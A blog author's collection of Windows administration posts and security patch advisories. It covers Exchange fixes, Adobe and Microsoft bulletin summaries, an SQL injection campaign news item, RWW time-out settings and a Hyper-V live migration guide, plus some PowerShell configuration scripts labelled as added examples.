
Ioannis Zontos

Blog Entries posted by Ioannis Zontos

  1. Ioannis Zontos
    The problem with the Exchange Management Console (EMC) in Microsoft Exchange 2007-2010 when Internet Explorer 9 is installed can now be resolved with a hotfix. The hotfix is not yet available for public download, because it will be included in a later rollup. The problem appeared with the following message:

    Exchange 2007 or 2010 EMC might fail to close with "You must close all dialog boxes before you can close Exchange Management Console"

    To resolve the problem:

    We must first install the released version of IE9 on the machine that runs Microsoft Exchange 2007-2010. Then we must install

    MS11-081: Cumulative Security Update for Internet Explorer: October 11, 2011

    This is available from Windows Update or, if we want to download it and keep it on the local network, the package is available here.

    Please note that the packages for client and server OSes might be different, depending on what you need. The installation of this package is REQUIRED for proper operation of the EMC hotfix.

    We can call Microsoft support and request the hotfix. When we request it, we must ask for KB 2624899 (which is not a publicly available article).



    How do I find the support phone number?

    Depending on the region we are in, we go here.

    Why is this hotfix not available for public download? (The answer from the Exchange Team Blog:)

    It's planned that this fix will be rolled into a version of Internet Explorer or a fix that will be released at a later time. Due to the amount of feedback we've received about this issue, we wanted to give you a way to resolve this problem right now, if you are impacted by it. Individual hotfix packages such as this one do not go through as extensive testing as our roll-up fixes and therefore we want to have a way to reach out to customers who use it in case there's a problem that is identified with it at a later time.

    Finally, I would like to thank the Internet Explorer team for working with us on this interoperability issue and producing this hotfix.




     


  2. Ioannis Zontos
    Severity: High
    Summary:
    · These vulnerabilities affect: Adobe Shockwave Player, Flash Player, Flash Media Server, and Photoshop
    · How an attacker exploits them: Multiple vectors of attack, including enticing your users to open malicious files or visit specially crafted web sites
    · Impact: Various results; in the worst case, an attacker can gain complete control of your computer
    · What to do: Install the appropriate Adobe patches immediately, or let Adobe's updater do it for you.
    Exposure:
    Yesterday, Adobe released five security bulletins describing vulnerabilities in many of their popular software packages, including Shockwave Player, Flash Player, Flash Media Server, Photoshop, and Robohelp. A remote attacker could exploit the worst of these flaws to gain complete control of your computer. The summary below details some of the vulnerabilities in these popular software packages.
    · APSB11-19: Seven Shockwave Player Vulnerabilities
    Adobe Shockwave Player displays interactive, animated web content and movies called Shockwave. According to Adobe, the Shockwave Player is installed on some 450 million PCs.
    Adobe’s bulletin warns of seven security vulnerabilities that affect Shockwave Player 11.6.0.626 and earlier for Windows and Macintosh (as well as all earlier versions). Adobe’s bulletin doesn’t describe the flaws in much technical detail. It only describes the nature and basic impact of each flaw. For the most part, the flaws consist of unspecified memory corruption vulnerabilities. Though these flaws differ technically, most of them share the same general scope and impact. If an attacker can entice one of your users into visiting a website containing some sort of malicious Shockwave content, he could exploit many of these vulnerabilities to execute code on that user’s computer, with that user’s privileges. If your Windows users have local administrator privileges, an attacker could exploit this flaw to gain full control of their PC.
    Adobe Severity: Critical
    · APSB11-20: Flash Media Server DoS Vulnerability
    Adobe Flash Player displays interactive, animated web content called Flash. Flash Media Server allows administrators to stream Flash content.
    Flash Media Server 4.0.2 and earlier suffer from an unspecified Denial of Service (DoS) vulnerability. Adobe does not share any relevant detail about this flaw, including no detail on how an attacker might exploit it. They only share that an attacker could somehow exploit the flaw to launch a DoS attack against your media server. 
    Adobe Severity: Critical
    · APSB11-21 : Flash Player Update Corrects 13 Security Flaws
    Adobe Flash Player displays interactive, animated web content called Flash. A recent report from Secunia states that 99% of Windows computers have Adobe Flash Player installed, so your users very likely have it.
    Adobe’s update fixes 13 security vulnerabilities in Flash Player (for Windows, Mac, Linux, and Solaris), which they don’t describe in much technical detail. However, they do describe the general scope and impact of these flaws. In the worst case, if an attacker can lure one of your users to a malicious website, they could exploit some of these flaws to gain control of that user’s computer. We assume the attacker would only gain the privileges of the logged in user. However, since most Windows users have local administrator privileges, the attacker would likely gain full control of Windows machines.
    Adobe Severity: Critical
    · APSB11-22: Photoshop GIF Handling Vulnerability
    Photoshop is a popular image editing program. Photoshop CS5 suffers from an unspecified vulnerability involving its inability to properly handle specially crafted GIF images. If an attacker can trick you into downloading and opening a malicious GIF image in Photoshop, she can exploit this flaw to execute code on your machine, with your privileges. If you have local admin privileges, the attacker gains complete control of your computer.
    Adobe Severity: Critical
    · APSB11-23: RoboHelp XSS Flaw
    RoboHelp 9 is software that helps you create help systems. It suffers from an unspecified Cross-Site Scripting (XSS) vulnerability. By enticing one of your users into clicking a specially crafted link, an attacker could run script on that user's computer under the context of the RoboHelp component.
    Adobe Severity: Important.
    Solution Path:
    Adobe has released updates for all their affected software. If you use any of the software below, we recommend you download and deploy the corresponding updates as soon as possible, or let Adobe’s automatic updater do it for you:
    · APSB11-19: Upgrade to Shockwave 11.6.1.629
    · APSB11-20: Upgrade to Flash Media Server 4.0.3 or 3.5.7
    · APSB11-21: Upgrade to Flash Player 10.3.183.5
    · APSB11-22:
    o Photoshop CS5 for Windows
    o Photoshop CS5 for Windows x64

    o Photoshop CS5 for Mac

    · APSB11-23: Upgrade RoboHelp 8 and 9:
    o RoboHelp 8
    o RoboHelp 9
    Status:
    Adobe has released patches correcting these issues.
    References:
    o Adobe Security Update APSB11-19
    o Adobe Security Update APSB11-20
    o Adobe Security Update APSB11-21
    o Adobe Security Update APSB11-22
    o Adobe Security Update APSB11-23
  3. Ioannis Zontos
    According to ComputerWorld and Symantec, attackers are currently leveraging a zero day vulnerability in Adobe Reader in targeted attacks against telecommunications, manufacturing, computer hardware, and chemical companies, as well as defence sector organisations like Lockheed Martin.

    The attacks may have started as early as the beginning of November, and arrive as a targeted phishing email with a malicious PDF attachment. If you open said attachment, your computer gets infected with information stealing malware.

    Earlier this week, Adobe confirmed this zero day flaw in a Security Advisory. The vulnerability affects all current versions of Reader and Acrobat running on any platform. Though they have not released a fix for the flaw yet, they plan to sometime next week.

    Until then, we highly recommend that you inform your users to be very careful handling PDF files that come from outside your organization, whether from a trusted source or not. If you have one of our security appliances, you can also use our proxy policies to strip all PDF content if you like. That said, doing so blocks both legitimate and malicious PDF files. Also, be sure to keep both your gateway and client level antivirus software up to date, as it likely has signatures to block known variants of this attack.




     


  4. Ioannis Zontos
    In recent years, many websites have been hijacked and booby-trapped with malicious code.
    If you visit such a website with an unpatched system, your computer may automatically and silently download and install malware. Lately, attackers have managed to hit thousands of websites at once. What is behind these mass attacks, and how are they carried out? Most of the time, automated SQL injection (SQLi).
    According to researchers at SANS, an automated SQL injection (SQLi) system named Lilupophilupop has infected over one million websites. This latest round of automated SQLi attacks targets Microsoft web servers (IIS servers with ASP.NET and an MSSQL backend), and first appeared in early December. At that time, the attack had affected few servers. However, recent SANS research shows that it has spread to just over one million websites today.
    If you want to learn more about this attack, you can find details in SANS' early December post.
    A short video of a simple SQL injection attack follows.
     
  5. Ioannis Zontos
    Summary:
    · These vulnerabilities affect: All current versions of Windows and components that ship with it
    · How an attacker exploits them: Multiple vectors of attack, including sending specially crafted network packets, enticing your users to open malicious files, or running malicious applications locally
    · Impact: Various results; in the worst case, an attacker can gain complete control of your Windows computer
    · What to do: Install the appropriate Microsoft patches immediately, or let Windows Automatic Update do it for you.
    Exposure:
    Yesterday, Microsoft released six security bulletins describing seven vulnerabilities that affect Windows and components that ship with it. Each vulnerability affects different versions of Windows to varying degrees. However, a remote attacker could exploit the worst of these flaws to gain complete control of your Windows PC. The summary below lists the vulnerabilities, in order from highest to lowest severity.
    · MS11-059: Data Access Components Code Execution Vulnerability
    According to Microsoft, Windows Data Access Components (Windows DAC) help provide access to information across an enterprise. Unfortunately, Windows DAC allows unrestricted access to the loading of external libraries. By enticing one of your users to open a specially crafted Excel file residing in the same location as a malicious DLL file, an attacker could exploit this flaw to execute code on that user's system, with that user's privileges. If your users have local administrative privileges, the attacker gains complete control of their machine. This flaw only affects Windows 7 and later.
    Microsoft rating: Important.
    · MS11-061: Remote Desktop Web Access XSS Vulnerability
    Windows Remote Desktop (RD) allows you to gain network access to your Windows desktop from anywhere. The Web Access component provides this capability through a web browser. Unfortunately, the RD Web Access component suffers from a Cross-Site Scripting (XSS) vulnerability. By enticing one of your users into clicking a specially crafted link, an attacker could run script on that user's computer under the context of the RD Web Access component, potentially giving the attacker access to your remote desktop. This flaw only affects Windows Server 2008 R2 x64.
    Microsoft rating: Important.
    · MS11-062: RAS NDISTAPI Driver Elevation of Privilege Vulnerability
    Remote Access Service (RAS) is a component that allows you to access networks over phone lines, and the NDISTAPI driver is one of the RAS components that helps provide this functionality. The NDISTAPI driver doesn't properly validate user input that it passes to the Windows kernel. By running a specially crafted application, an attacker can leverage this flaw to elevate his privilege, gaining complete control of your Windows machine. However, the attacker would first need to gain local access to your Windows computers using valid credentials, in order to run his special program. This factor significantly reduces the risk of this flaw. Finally, this flaw only affects XP and Server 2003.
    Microsoft rating: Important.
    · MS11-063: CSRSS Elevation of Privilege Vulnerability
    The Client/Server Run-time SubSystem (CSRSS) is an essential Windows component responsible for console windows and creating and deleting threads. It suffers from an Elevation of Privilege (EoP) vulnerability. Like the NDISTAPI driver flaw above, by running a specially crafted program, an authenticated attacker could leverage this flaw to gain complete, SYSTEM-level control of your Windows computers. However, like before, the attacker would first need to gain local access to your Windows computers using valid credentials, which somewhat reduces the risk of this flaw.
    Microsoft rating: Important.
    · MS11-064: TCP/IP Stack DoS Vulnerabilities
    The Windows TCP/IP stack provides IP-based network connectivity to your computer. It suffers from two Denial of Service (DoS) vulnerabilities. One of the flaws is a variant of the very old Ping of Death vulnerability. By sending a specially crafted ICMP message, an attacker can cause your system to stop responding or reboot. Most firewalls, including WatchGuard's XTM appliances, prevent external exploit of this classic DoS flaw. The second flaw has to do with how the TCP/IP stack handles specially crafted URLs. By sending a specially crafted URL to one of your Windows Web servers, an attacker could exploit this flaw to cause the server to lock up or reboot. These flaws only affect Windows Vista and later.
    Microsoft rating: Important.
    · MS11-068: Windows Kernel DoS Vulnerability
    The kernel is the core component of any computer operating system. The Windows kernel suffers from a Denial of Service (DoS) vulnerability, involving a flaw in the way it parses metadata in files. By running a specially crafted program, an attacker could leverage this flaw to gain complete control of your Windows computers. However, the attacker would first need to gain local access to your Windows computers using valid credentials. This factor significantly reduces the risk of this flaw. This flaw only affects Windows Vista and later.
    Microsoft rating: Moderate.
    Solution Path:
    Microsoft has released patches for Windows which correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these for you.
    MS11-059:
    · For Windows 7 (w/SP1)
    · For Windows 7 x64 (w/SP1)
    · For Windows Server 2008 R2 x64 (w/SP1)
    · For Windows Server 2008 R2 Itanium (w/SP1)
    MS11-061:
    · For Windows Server 2008 R2 x64
    MS11-062:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    MS11-063:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP2)
    · For Windows Vista x64 (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7 (w/SP1)
    · For Windows 7 x64 (w/SP1)
    · For Windows Server 2008 R2 x64 (w/SP1)
    · For Windows Server 2008 R2 Itanium (w/SP1)
    MS11-064:
    · For Windows Vista (w/SP2)
    · For Windows Vista x64 (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7 (w/SP1)
    · For Windows 7 x64 (w/SP1)
    · For Windows Server 2008 R2 x64 (w/SP1)
    · For Windows Server 2008 R2 Itanium (w/SP1)
    MS11-068:
    · For Windows Vista (w/SP2)
    · For Windows Vista x64 (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7 (w/SP1)
    · For Windows 7 x64 (w/SP1)
    · For Windows Server 2008 R2 x64 (w/SP1)
    · For Windows Server 2008 R2 Itanium (w/SP1)
  6. Ioannis Zontos
    After installing Microsoft Exchange 2007 Service Pack 3, rollup #1 or rollup #2, if we try to create a new receive connector we get the following error:
    Summary: 1 item(s). 0 succeeded, 1 failed.
    Elapsed time: 00:00:00
    test
    Failed
    Error:
    Active Directory operation failed on SBS01.ks.local. This error is not retriable. Additional information: The parameter is incorrect.
    Active directory response: 00000057: LdapErr: DSID-0C090C26, comment: Error in attribute conversion operation, data 0, v1772
    The requested attribute does not exist.
    Exchange Management Shell command attempted:
    new-ReceiveConnector -Name 'test' -Usage 'Custom' -Bindings '0.0.0.0:25' -Fqdn 'test.test.com' -RemoteIPRanges '0.0.0.0-255.255.255.255' -Server 'SBS01'
    Elapsed Time: 00:00:00

    Note: The existing connectors keep working without any problem. The error appears only when we create a new connector or try to edit an existing one, which is why you may have installed SP3 and the rollups without the problem being noticed.

    The problem appears because the schema was not prepared first during the automatic installation of SP3, as stated on the Microsoft TechNet site http://technet.microsoft.com/en-us/library/ff607233(EXCHG.80).aspx
    Active Directory must first be prepared for each domain before we proceed with the installation of Exchange 2007 SP3: "This process includes updating the Active Directory schema for Exchange 2007 SP3"
    To resolve the problem we need the extracted SP3. If we do not have it, it is available at
    http://www.microsoft.com/downloads/en/details.aspx?FamilyID=1687160b-634a-43cb-a65a-f355cff0afa6&displaylang=en
    Once we have extracted it, we open a command prompt, go to the folder where we extracted it, and run the command Setup.com /PrepareSchema


    Once the schema preparation is complete, we are ready and can create the connectors we want without any problem.


  7. Ioannis Zontos
    To change the client time-out for Remote Web Workplace (default = 30 minutes):
    1. Open Registry Editor.
    2. Locate:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SmallBusinessServer\RemoteUserPortal
    If RemoteUserPortal does not exist, create it.
    3. Create a DWORD (32-bit) value named PublicTimeOut.
    4. In Value data, enter the number of minutes after which the Remote Web Workplace session should time out.
    Important: the value must not be greater than 1440 decimal (5A0 hex). If it is, it will not work properly.
    5. Click OK.
    To change the server time-out for Remote Web Workplace (default = 20 minutes):
    1. On the Windows SBS 2008 server, go to Start --> Administrative Tools --> Internet Information Services (IIS) Manager.
    2. At the User Account Control prompt, click Continue (if you have it enabled, which you should).
    3. On the left, double-click the server name.
    4. Double-click Sites to expand it, and then double-click SBS Web Applications.
    5. In SBS Web Applications Home, double-click Session State.
    6. Under Cookie Settings, change the Time-out (in minutes).
    7. Finally, click OK to save our changes.
    If the client timeout value is greater than the server timeout value:
    The RWW page will log you off after the client timeout value and return you to the RWW logon page without any other message. If we open OWA from the link in RWW, the OWA page will also be logged off and will return us to the OWA logon page as soon as we click anything inside OWA.
    If the client timeout value is equal to or less than the server timeout value:
    The RWW page will log you off based on the client timeout value, and a message will be shown on screen.
    If we have opened OWA from the link in RWW, OWA will stay open until its own timeout (which is 15 minutes). For information about the OWA idle timeout, see TechNet:
    OWA Public TimeOut (default is 15 minutes)
    OWA Private TimeOut (default is 8 hours)
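    The client time-out steps above, scripted with the limit check built in. This is an added example, not part of the original post; it assumes PowerShell 2.0 or later running elevated on the SBS 2008 server, and the function and parameter names are hypothetical.

    ```powershell
    # Added example, not from the original post. Function and parameter names are hypothetical.
    function Set-RwwClientTimeout {
        [CmdletBinding()]
        param(
            [Parameter(Mandatory = $true)]
            [ValidateRange(1, 1440)]      # upper limit from the post: 1440 decimal (5A0 hex)
            [int]$Minutes,

            # Server time-out as shown in IIS Manager > Session State.
            # 20 is the default quoted in the post; pass the real value if it was changed.
            [int]$ServerTimeoutMinutes = 20
        )

        $key = 'HKLM:\SOFTWARE\Microsoft\SmallBusinessServer\RemoteUserPortal'

        # Step 2: create the RemoteUserPortal key if it does not exist.
        if (-not (Test-Path -Path $key)) {
            New-Item -Path $key -Force | Out-Null
        }

        # Steps 3-4: DWORD value PublicTimeOut, in minutes. -Force overwrites an existing value.
        New-ItemProperty -Path $key -Name 'PublicTimeOut' -PropertyType DWord `
            -Value $Minutes -Force | Out-Null

        # Read the value back so a failed or redirected write is noticed immediately.
        $stored = (Get-ItemProperty -Path $key -Name 'PublicTimeOut').PublicTimeOut
        if ($stored -ne $Minutes) {
            throw "PublicTimeOut read back as $stored, expected $Minutes"
        }

        # Which of the two behaviours described in the post applies.
        if ($stored -gt $ServerTimeoutMinutes) {
            $behaviour = 'RWW logs off after the client time-out with no message; ' +
                         'OWA opened from RWW is logged off as well'
        } else {
            $behaviour = 'RWW logs off at the client time-out with an on-screen message; ' +
                         'OWA opened from RWW stays open until its own time-out'
        }

        New-Object PSObject -Property @{
            ClientTimeoutMinutes = $stored
            ServerTimeoutMinutes = $ServerTimeoutMinutes
            ExpectedBehaviour    = $behaviour
        }
    }

    # Example call: 15-minute client time-out against the default 20-minute server time-out.
    Set-RwwClientTimeout -Minutes 15 -ServerTimeoutMinutes 20
    ```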
  8. Ioannis Zontos
    In Windows Server 2012, one of the new Hyper-V features is Live Migration without Shared Storage. In the previous version, Live Migration required cluster shared storage and cluster settings. Now you can move VMs from one Hyper-V server to other Hyper-V servers without cluster shared storage and cluster settings.
    We will see how to perform Live Migration without shared storage.
    Prerequisites
    Both Hyper-V servers must be joined to the same Active Directory domain. For the live migration to succeed, the user account must be a member of the Domain Administrator group.
    Environment
    We need 1 domain controller, named DC01, for "test.company.com". We have 2 Hyper-V servers, named "HVSVR01" and "HVSVR02", which are joined to the "test.company.com" domain. Both Hyper-V servers have 2 network cards, with 10.0.0.0/8 as the domain network and 172.16.0.0/16 as the live migration network. 1 VM for the test is located on HVSVR01. We have 2 virtual switches, "HVSVR01-Switch" and "HVSVR02-Switch". "HVSVR01-Switch" is configured on HVSVR01 and "HVSVR02-Switch" is configured on HVSVR02.
    Configure Kerberos authentication and the live migration network for the Hyper-V servers
    Live migration in Windows Server 2012 supports 2 authentication protocols, "CredSSP" and "Kerberos".
    By default, Hyper-V servers use "CredSSP".
    To use Kerberos authentication, we must configure Kerberos delegation on the servers.
    1. On DC01, log in as Domain Administrator.
    2. Launch "Active Directory Users and Computers".
    3. Go to our domain "test.company.com" and then to "Computers".

    4. Right-click "HVSVR01" –> "Properties".
    5. Select the "Delegation" tab.
    6. Select "Trust this computer for delegation to specified services only > Use Kerberos only".
    7. Click "Add".
    8. Click "Users or Computers".
    9. Enter "HVSVR02".

    10. Select "cifs" and "Microsoft Virtual System Migration Service".
    11. Click "OK".

    12. Click "OK".
    13. Repeat steps 4 - 12 on the other server, HVSVR02.

    14. Close "Active Directory Users and Computers".
    15. Go to HVSVR01 and log in as Domain Administrator.
    16. Launch "Hyper-V Manager".
    17. Go to "Hyper-V Settings".

    18. Select "Live Migrations".
    19. Check "Enable incoming and outgoing live migrations".
    20. Under "Authentication protocol", select "Use Kerberos".
    21. Under "Incoming live migrations", select "Use these IP addresses for live migration".
    22. Click "Add".
    23. In "IP Address", enter "172.16.0.0/16".

    24. Click "OK".

    Normally, live migration should have separate network cards and a separate network on both servers, but we can also use the domain network.
    25. Click "OK".
    26. Repeat steps 16 - 25 on HVSVR02.
    Moving the VM
    1. In "Hyper-V Manager" on HVSVR01, right-click "FS01.test.company.com".
    2. Select "Move".


    5. Click "Next".
    6. On the "Specify Destination" screen, next to "Name", enter "HVSVR02".

    7. Click "Next".
    8. Under "Choose Move Options", select "Move the virtual machine's data to a single location".

    9. Select the network switch.


    And we are done, very simply and very quickly.
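    The same delegation, host settings and move, done with the ActiveDirectory and Hyper-V PowerShell modules instead of the GUI. This is an added example, not part of the original post; it assumes it is run as a domain administrator on a domain-joined machine with both modules installed, and the destination path D:\VMs\FS01 is hypothetical.

    ```powershell
    # Added example, not from the original post. Host names, domain, VM name, switch name
    # and migration subnet are the walkthrough's; D:\VMs\FS01 is a hypothetical path.
    Import-Module ActiveDirectory
    Import-Module Hyper-V

    $hvHosts  = 'HVSVR01', 'HVSVR02'
    $domain   = 'test.company.com'
    $services = 'cifs', 'Microsoft Virtual System Migration Service'

    # Delegation steps 4-13: each host may delegate only to these two services on the
    # other host, Kerberos only (no unconstrained delegation, no protocol transition).
    foreach ($source in $hvHosts) {
        $target = $hvHosts | Where-Object { $_ -ne $source }
        $spns = foreach ($svc in $services) {
            "$svc/$target"                  # NetBIOS form
            "$svc/${target}.${domain}"      # FQDN form
        }

        $computer = Get-ADComputer -Identity $source -Properties 'msDS-AllowedToDelegateTo'
        $missing  = $spns | Where-Object { $computer.'msDS-AllowedToDelegateTo' -notcontains $_ }
        if ($missing) {
            Set-ADComputer -Identity $computer -Add @{ 'msDS-AllowedToDelegateTo' = [string[]]$missing }
        }
        Set-ADAccountControl -Identity $computer `
            -TrustedForDelegation $false -TrustedToAuthForDelegation $false
    }

    # Host steps 16-26: enable live migration, Kerberos authentication, and restrict
    # incoming migrations to the dedicated 172.16.0.0/16 network.
    Enable-VMMigration -ComputerName $hvHosts
    Set-VMHost -ComputerName $hvHosts `
        -VirtualMachineMigrationAuthenticationType Kerberos `
        -UseAnyNetworkForMigration $false
    Add-VMMigrationNetwork -ComputerName $hvHosts -Subnet '172.16.0.0/16'

    # Check the result before moving anything.
    Get-VMHost -ComputerName $hvHosts |
        Select-Object Name, VirtualMachineMigrationEnabled,
                      VirtualMachineMigrationAuthenticationType, UseAnyNetworkForMigration
    Get-ADComputer -Filter "Name -eq 'HVSVR01' -or Name -eq 'HVSVR02'" `
        -Properties 'msDS-AllowedToDelegateTo', TrustedForDelegation, TrustedToAuthForDelegation |
        Select-Object Name, TrustedForDelegation, TrustedToAuthForDelegation, 'msDS-AllowedToDelegateTo'

    # Move the VM with its storage to a single location on HVSVR02.
    $report = Compare-VM -ComputerName 'HVSVR01' -Name 'FS01.test.company.com' `
        -DestinationHost 'HVSVR02' -IncludeStorage -DestinationStoragePath 'D:\VMs\FS01'

    # The two hosts use different switch names, so the adapter has to be reconnected
    # (step 9 in the wizard). 33012 is the ID Hyper-V reports for a virtual switch that
    # is missing on the destination; list $report.Incompatibilities to confirm.
    $report.Incompatibilities |
        Where-Object { $_.MessageId -eq 33012 } |
        ForEach-Object { $_.Source | Connect-VMNetworkAdapter -SwitchName 'HVSVR02-Switch' }

    Move-VM -CompatibilityReport $report
    ```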
  9. Ioannis Zontos
    A very good video on creating a workflow with Orchestrator in System Center 2012.
    In the video we see the following:
    · Create an Orchestrator runbook that will:
    o Receive data from Service Manager via the databus
    o Get information about SQL Server
    o Update an object in Service Manager
    o Show exception handling of a process
    o Launch a PowerShell script
    o Return data from a .NET script
    · Sync the runbook and connector with Service Manager
    · Create a Service Manager activity template that can be called within a service request offering
    · Create a request offering using the activity template
    http://technet.microsoft.com/en-us/video/private-cloud-demo-extravaganza-8-create-an-orchestrator-runbook-and-integrate-with-service-manager-with-system-center-2012
  10. Ioannis Zontos
    Summary:
    · These vulnerabilities affect: All current versions of Windows and components that ship with it (as well as some optional components like .NET Framework)
    · How an attacker exploits them: Multiple vectors of attack, including sending specially crafted network traffic or enticing your users to view malicious images
    · Impact: Various results; in the worst case, an attacker can gain complete control of your Windows computer
    · What to do: Install the appropriate Microsoft patches immediately, or let Windows Automatic Update do it for you.
    Exposure:
    Today, Microsoft released eleven security bulletins describing a dozen vulnerabilities that affect Windows and components that ship with it. Each vulnerability affects different versions of Windows to varying degrees. However, a remote attacker could exploit the worst of these flaws to gain complete control of your Windows PC. The summary below lists the vulnerabilities, in order from highest to lowest severity (according to Microsoft's summary).
    · MS11-038: OLE Automation Code Execution Vulnerability
    According to Microsoft, Object Linking and Embedding (OLE) Automation is a Windows protocol that allows an application to share data with or to control another application. Unfortunately, OLE Automation suffers from a vulnerability involving the way it parses specially crafted Windows MetaFile (WMF) images. By tricking a user into viewing a specially crafted image, perhaps hosted on a web site, an attacker could exploit this flaw to execute code with that user's privileges. If your users have local administrative privileges, the attacker gains complete control of their machines.
    Microsoft rating: Critical
    · MS11-039 & MS11-044: Two .NET Framework Code Execution Vulnerabilities
    The .NET Framework is a software framework used by developers to create new Windows and web applications. The .NET Framework (and SilverLight) suffers from two complex vulnerabilities having to do with how it validates parameters passed to network functions, or how its JIT compiler validates values within objects. The scope and impact of these complex vulnerabilities differs depending on the attack vector. There are three potential vectors of attack: An attacker can host a malicious .NET web site; attack your .NET web site, or leverage one of your custom .NET applications to potentially elevate his privilege. We believe the malicious .NET web site poses the most risk. If an attacker can entice you to a specially crafted site (or to a legitimate site that somehow links to his malicious site), he can exploit this flaw to execute code on your computer, with your privileges. If you are a local administrator, the attacker has full control of your machine. If you've installed .NET Framework, you should patch, even if you do not run custom .NET applications or web sites.
    Microsoft rating: Critical
    · MS11-041: Kernel-Mode Drivers Code Execution Vulnerability
    The kernel is the core component of any computer operating system. Windows also ships with a kernel-mode device driver (win32k.sys) which handles many kernel-level devices. This kernel-mode driver suffers from a code execution flaw involving the way it handles OpenType fonts on 64-bit systems. By enticing one of your users to view a specially crafted font, an attacker could exploit this flaw to gain full control of that user's computer (regardless of the user's privilege). However, the malicious font would have to reside on the local computer, or a network share in order for this attack to succeed. Again, the flaw only affects 64-bit versions of Windows.
    Microsoft rating: Critical
    · MS11-042: DFS Memory Corruption Vulnerability
    Microsoft's Distributed File System (DFS) is a collection of client and server services that allows you to create what appears to be a single file share, but actually consists of shares on multiple hosts. The Windows DFS service suffers from two security vulnerabilities. The worst is a memory corruption flaw that has to do with how the DFS client handles specially crafted DFS responses. By hosting a malicious server on your network, which sends specially crafted DFS responses to requesting clients, an attacker could exploit this memory corruption flaw to gain complete control of a Windows computer (or in some cases, just crash your computer). That said, most administrators do not allow DFS traffic past their firewall. So these vulnerabilities primarily pose an internal risk.
    Microsoft rating: Critical
    · MS11-043: SMB Client Code Execution Vulnerability
    Microsoft Server Message Block (SMB) is the protocol Windows uses for file and print sharing. According to Microsoft, the Windows SMB client suffers from a security vulnerability which attackers could leverage to execute malicious code. By enticing one of your users to connect to a malicious SMB server, or by sending a specially crafted SMB message in response to a legitimate local request, an attacker can exploit this flaw to gain complete control of a vulnerable Windows computer. However, firewalls like WatchGuard's XTM appliances typically block SMB traffic from the Internet, making these vulnerabilities primarily an internal risk. That said, many types of malware leverage SMB vulnerabilities to self-propagate within networks, once they infect their first victim.
    Microsoft rating: Critical
    · MS11-037: MHTML Information Disclosure Vulnerability
    In our February advanced notification post, we mentioned a zero day MHTML vulnerability that was similar to a Cross-site Scripting (XSS) vulnerability. The flaw involves the Windows MHTML or MIME HTML component, which is used to handle special web pages that include both HTML and MIME (typically pictures, audio, or video) content contained in one file. If an attacker can entice you to visit a specially crafted web-page, or click a malicious link, he could exploit this flaw in much the same way he might exploit a Cross-Site Scripting (XSS) vulnerability; to steal your cookies, redirect your browser to malicious sites, or essentially take any action you could on a web site. Last April, Microsoft supposedly fixed this flaw. However, their fix must not have been complete since this update fixes a new variant of essentially the same issue.
    Microsoft rating: Important.
    · MS11-046: AFD Elevation of Privilege Vulnerability
    The Ancillary Function Driver (AFD.sys) is a driver that handles Winsock TCP/IP communications. This kernel-mode driver suffers from an elevation of privilege (EoP) vulnerability. By running a specially crafted program, a local attacker could leverage this flaw to gain complete control of your Windows computers. However, the attacker would first need to gain local access to your Windows computers using valid credentials. This factor significantly reduces the risk of this flaw.
    Microsoft rating: Important
    · MS11-047: Windows 2008 Hyper-V DoS Vulnerability
    Hyper-V is the hypervisor technology that Windows 2008 uses for virtualization. Hyper-V suffers from a Denial of Service (DoS) vulnerability having to do with how it handles specially crafted communications between a guest OS and the host OS. By running a specially crafted program within a guest OS, an attacker can exploit this flaw to cause a 2008 server to stop responding until you reboot it. However, the attacker needs administrative access on the guest OS in order to exploit this flaw. The flaw only affects 2008 servers.
    Microsoft rating: Important
    · MS11-048: SMB Server DoS Vulnerability
    The Windows SMB Server suffers from a Denial of Service (DoS) vulnerability having to do with how it handles specially crafted SMB requests. By sending a specially crafted SMB packet, an attacker can exploit this flaw to cause a Windows computer to stop responding until you reboot it. Like the SMB client vulnerability mentioned before, this vulnerability primarily poses an internal risk since firewalls block SMB.
    Microsoft rating: Important
    · MS11-051: AD Certificate Services Web Enrollment EoP Vulnerability
    The Active Directory (AD) Certificates Services Web Enrollment site suffers from a Cross-site Scripting (XSS) vulnerability. By enticing one of your users to click a specially crafted link, an attacker could exploit this flaw to steal your cookies, redirect your browser to malicious sites, or essentially take any action you could on the AD Web Enrollment site. This flaw only affects the non-Itanium, server versions of Windows.
    Microsoft rating: Important
    Solution Path:
    Microsoft has released patches for Windows which correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these for you.
    MS11-038:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2) *
    · For Windows Server 2008 x64 (w/SP2) *
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64 *
    · For Windows Server 2008 R2 Itanium
    * Note: Server Core installations not affected.
    MS11-039 & MS11-044:
    Due to the complicated, version-dependent nature of .NET Framework updates, we recommend you see the Affected & Non-Affected Software section of Microsoft's Bulletins for patch details (or let Windows Automatic Updates handle the patch for you).
    · MS11-039 Affected & Non-Affected Software section
    · MS11-044 Affected & Non-Affected Software section
    MS11-041:
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
